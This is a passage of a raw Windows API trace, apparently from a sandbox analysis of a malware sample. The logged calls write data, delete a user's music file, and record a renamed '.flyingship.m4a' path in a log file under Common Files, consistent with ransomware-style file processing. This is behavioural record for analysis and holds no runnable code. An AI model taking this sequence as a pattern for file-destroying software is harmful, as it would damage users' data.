[0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0181.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.378] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0181.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd630, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.379] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0181.379] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xef06, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xef06, lpOverlapped=0x0) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0181.380] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0181.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.381] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0181.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.382] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.383] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", lpFilePart=0x0) returned 0x40 [0181.385] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0x11624e00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 0x90ae18 [0181.386] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\cem-br.m4a")) returned 1 [0181.389] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0x11624e00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 0 [0181.389] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0181.390] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.391] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.393] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.393] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0181.393] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.393] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0181.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.394] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0181.394] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1de1, lpOverlapped=0x0) returned 1 [0181.395] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0181.395] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1de1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.395] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0181.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0181.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923b28 [0181.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a\r\n", cchWideChar=78, lpMultiByteStr=0x923b28, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 78 [0181.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0181.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0181.395] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4d, lpOverlapped=0x0) returned 1 [0181.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0181.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.396] CloseHandle (hObject=0x138) returned 1 [0181.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0181.399] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0181.399] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 